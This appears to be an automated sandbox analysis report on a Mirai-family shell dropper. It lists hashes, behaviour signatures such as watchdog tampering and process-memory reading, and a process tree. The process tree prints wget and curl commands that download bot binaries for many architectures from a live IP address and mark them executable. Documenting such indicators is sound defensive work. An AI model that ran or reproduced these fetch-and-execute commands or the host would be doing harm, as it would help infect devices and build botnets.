Analysis
-
max time kernel
149s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
27/03/2025, 12:13
Static task
static1
Behavioral task
behavioral1
Sample
ohsitsvegawellrip.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohsitsvegawellrip.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohsitsvegawellrip.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
ohsitsvegawellrip.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ohsitsvegawellrip.sh
-
Size
3KB
-
MD5
bd5e291801c56bce037d4222db8048a8
-
SHA1
604dbdedf1611a4e40546cb19455c5d49bdd2537
-
SHA256
75c2685fac6f7d0eb80f04d174e8977d0363398e9c2852b1939d9951606331c5
-
SHA512
5cfc3d4e72d492e24418106f2713525e544be0bd47342f59ce7d3beba59f59a2540bfab00b6a219df644840911bf4144cabcc4111b989afdbd7b1e520e2ffa07
Malware Config
Signatures
-
Mirai family
-
Contacts a large (15046) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1528 chmod 1538 chmod 1558 chmod 1640 chmod 1548 chmod 1580 chmod 1600 chmod 1610 chmod 1500 chmod 1590 chmod 1620 chmod 1570 chmod 1630 chmod 1481 chmod 1518 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/loudscream 1482 ohsitsvegawellrip.sh /tmp/loudscream 1501 ohsitsvegawellrip.sh /tmp/loudscream 1519 ohsitsvegawellrip.sh /tmp/loudscream 1529 ohsitsvegawellrip.sh /tmp/loudscream 1539 ohsitsvegawellrip.sh /tmp/loudscream 1549 ohsitsvegawellrip.sh /tmp/loudscream 1559 ohsitsvegawellrip.sh /tmp/loudscream 1571 ohsitsvegawellrip.sh /tmp/loudscream 1581 ohsitsvegawellrip.sh /tmp/loudscream 1591 ohsitsvegawellrip.sh /tmp/loudscream 1601 ohsitsvegawellrip.sh /tmp/loudscream 1611 ohsitsvegawellrip.sh /tmp/loudscream 1621 ohsitsvegawellrip.sh /tmp/loudscream 1631 ohsitsvegawellrip.sh /tmp/loudscream 1641 ohsitsvegawellrip.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog ohsitsvegawellrip.sh File opened for modification /dev/misc/watchdog ohsitsvegawellrip.sh -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp ohsitsvegawellrip.sh -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 37 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/960/maps ohsitsvegawellrip.sh File opened for reading /proc/435/maps ohsitsvegawellrip.sh File opened for reading /proc/431/maps ohsitsvegawellrip.sh File opened for reading /proc/947/maps ohsitsvegawellrip.sh File opened for reading /proc/645/maps ohsitsvegawellrip.sh File opened for reading /proc/529/maps ohsitsvegawellrip.sh File opened for reading /proc/536/maps ohsitsvegawellrip.sh File opened for reading /proc/699/maps ohsitsvegawellrip.sh File opened for reading /proc/701/maps ohsitsvegawellrip.sh File opened for reading /proc/479/maps ohsitsvegawellrip.sh File opened for reading /proc/502/maps ohsitsvegawellrip.sh File opened for reading /proc/952/maps ohsitsvegawellrip.sh File opened for reading /proc/429/maps ohsitsvegawellrip.sh File opened for reading /proc/444/maps ohsitsvegawellrip.sh File opened for reading /proc/445/maps ohsitsvegawellrip.sh File opened for reading /proc/501/maps ohsitsvegawellrip.sh File opened for reading /proc/559/maps ohsitsvegawellrip.sh File opened for reading /proc/656/maps ohsitsvegawellrip.sh File opened for reading /proc/709/maps ohsitsvegawellrip.sh File opened for reading /proc/940/maps ohsitsvegawellrip.sh File opened for reading /proc/447/maps ohsitsvegawellrip.sh File opened for reading /proc/473/maps ohsitsvegawellrip.sh File opened for reading /proc/587/maps ohsitsvegawellrip.sh File opened for reading /proc/633/maps ohsitsvegawellrip.sh File opened for reading /proc/664/maps ohsitsvegawellrip.sh File opened for reading /proc/625/maps ohsitsvegawellrip.sh File opened for reading /proc/468/maps ohsitsvegawellrip.sh File opened for reading /proc/407/maps ohsitsvegawellrip.sh File opened for reading /proc/442/maps ohsitsvegawellrip.sh File opened for reading /proc/449/maps ohsitsvegawellrip.sh File opened for reading /proc/451/maps ohsitsvegawellrip.sh File opened for reading /proc/586/maps ohsitsvegawellrip.sh File opened for reading /proc/949/maps ohsitsvegawellrip.sh File opened for reading /proc/459/maps ohsitsvegawellrip.sh File opened for reading /proc/517/maps ohsitsvegawellrip.sh File opened for reading /proc/624/maps ohsitsvegawellrip.sh File opened for reading /proc/870/maps ohsitsvegawellrip.sh -
Changes its process name 15 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself a 1482 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1501 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1519 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1529 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1539 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1549 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1559 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1571 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1581 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1591 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1601 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1611 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1621 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1631 ohsitsvegawellrip.sh Changes the process name, possibly in an attempt to hide itself a 1641 ohsitsvegawellrip.sh -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp ohsitsvegawellrip.sh -
description ioc Process File opened for reading /proc/1039/maps ohsitsvegawellrip.sh File opened for reading /proc/1053/maps ohsitsvegawellrip.sh File opened for reading /proc/1139/maps ohsitsvegawellrip.sh File opened for reading /proc/1147/maps ohsitsvegawellrip.sh File opened for reading /proc/1150/maps ohsitsvegawellrip.sh File opened for reading /proc/1161/maps ohsitsvegawellrip.sh File opened for reading /proc/1009/maps ohsitsvegawellrip.sh File opened for reading /proc/1057/maps ohsitsvegawellrip.sh File opened for reading /proc/1089/maps ohsitsvegawellrip.sh File opened for reading /proc/1113/maps ohsitsvegawellrip.sh File opened for reading /proc/1121/maps ohsitsvegawellrip.sh File opened for reading /proc/1136/maps ohsitsvegawellrip.sh File opened for reading /proc/1154/maps ohsitsvegawellrip.sh File opened for reading /proc/1156/maps ohsitsvegawellrip.sh File opened for reading /proc/1033/maps ohsitsvegawellrip.sh File opened for reading /proc/1060/maps ohsitsvegawellrip.sh File opened for reading /proc/1099/maps ohsitsvegawellrip.sh File opened for reading /proc/1108/maps ohsitsvegawellrip.sh File opened for reading /proc/1125/maps ohsitsvegawellrip.sh File opened for reading /proc/1129/maps ohsitsvegawellrip.sh File opened for reading /proc/1141/maps ohsitsvegawellrip.sh File opened for reading /proc/1144/maps ohsitsvegawellrip.sh File opened for reading /proc/1004/maps ohsitsvegawellrip.sh File opened for reading /proc/1062/maps ohsitsvegawellrip.sh File opened for reading /proc/1069/maps ohsitsvegawellrip.sh File opened for reading /proc/1076/maps ohsitsvegawellrip.sh File opened for reading /proc/1080/maps ohsitsvegawellrip.sh File opened for reading /proc/1117/maps ohsitsvegawellrip.sh -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1474 ohsitsvegawellrip.sh 1489 curl -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/k03ldc.arm7 curl File opened for modification /tmp/k03ldc.i486 wget File opened for modification /tmp/k03ldc.arm wget File opened for modification /tmp/k03ldc.arm6 curl File opened for modification /tmp/k03ldc.arc curl File opened for modification /tmp/k03ldc.i686 curl File opened for modification /tmp/loudscream ohsitsvegawellrip.sh File opened for modification /tmp/k03ldc.mpsl wget File opened for modification /tmp/k03ldc.arm curl File opened for modification /tmp/k03ldc.arm5 curl File opened for modification /tmp/k03ldc.m68k curl File opened for modification /tmp/k03ldc.x86_64 wget File opened for modification /tmp/k03ldc.mips curl File opened for modification /tmp/k03ldc.m68k wget File opened for modification /tmp/k03ldc.spc wget File opened for modification /tmp/k03ldc.mpsl curl File opened for modification /tmp/k03ldc.arm5 wget File opened for modification /tmp/k03ldc.arm7 wget File opened for modification /tmp/k03ldc.x86_64 curl File opened for modification /tmp/k03ldc.i486 curl File opened for modification /tmp/k03ldc.spc curl File opened for modification /tmp/k03ldc.arc wget File opened for modification /tmp/k03ldc.i686 wget File opened for modification /tmp/k03ldc.x86 wget File opened for modification /tmp/k03ldc.x86 curl File opened for modification /tmp/k03ldc.ppc wget File opened for modification /tmp/k03ldc.sh4 wget File opened for modification /tmp/k03ldc.arm6 wget File opened for modification /tmp/k03ldc.ppc curl File opened for modification /tmp/k03ldc.sh4 curl
Processes
-
/tmp/ohsitsvegawellrip.sh/tmp/ohsitsvegawellrip.sh1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1474 -
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.x862⤵
- Writes file to tmp directory
PID:1475
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.x862⤵
- Writes file to tmp directory
PID:1479
-
-
/bin/catcat k03ldc.x862⤵PID:1480
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-up6Owx2⤵
- File and Directory Permissions Modification
PID:1481
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc2⤵PID:1485
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1489
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.mips k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-up6Owx2⤵
- File and Directory Permissions Modification
PID:1500
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.mpsl2⤵
- Writes file to tmp directory
PID:1512
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.mpsl2⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-up6Owx2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arm2⤵
- Writes file to tmp directory
PID:1522
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arm2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arm k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-up6Owx2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arm52⤵
- Writes file to tmp directory
PID:1532
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arm52⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arm k03ldc.arm5 k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-up6Owx2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arm62⤵
- Writes file to tmp directory
PID:1542
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arm62⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-up6Owx2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arm72⤵
- Writes file to tmp directory
PID:1552
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arm72⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-up6Owx2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.ppc2⤵
- Writes file to tmp directory
PID:1564
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.ppc2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.m68k2⤵
- Writes file to tmp directory
PID:1574
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.m68k2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.sh42⤵
- Writes file to tmp directory
PID:1584
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.sh42⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.spc2⤵
- Writes file to tmp directory
PID:1594
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.spc2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arc2⤵
- Writes file to tmp directory
PID:1604
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arc2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arc k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.x86_642⤵
- Writes file to tmp directory
PID:1614
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.x86_642⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arc k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 k03ldc.x86_64 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.i6862⤵
- Writes file to tmp directory
PID:1624
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.i6862⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arc k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.i686 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 k03ldc.x86_64 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.i4862⤵
- Writes file to tmp directory
PID:1634
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.i4862⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/chmodchmod +x config-err-G4apKo k03ldc.arc k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.i486 k03ldc.i686 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 k03ldc.x86_64 loudscream netplan_iqgixu2l ohsitsvegawellrip.sh snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY2⤵
- File and Directory Permissions Modification
PID:1640
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD524356e787f328a42cc9ea7ec243e9814
SHA1a3ef01ab629812d31fd18f35a0414a464e832f39
SHA256129a3f3ab60b25f8cc9ccb21136710f486cdf8269f0b3c67ef44f88cecd107ac
SHA5120a05e80260cbe65030dd70448d6951c4f9d6f8e1a3a47b33cf13c64a3dfdc302f6a50f5322cf094e167744dc2b29c03905d9386e4870069b59b5588396c0c5dd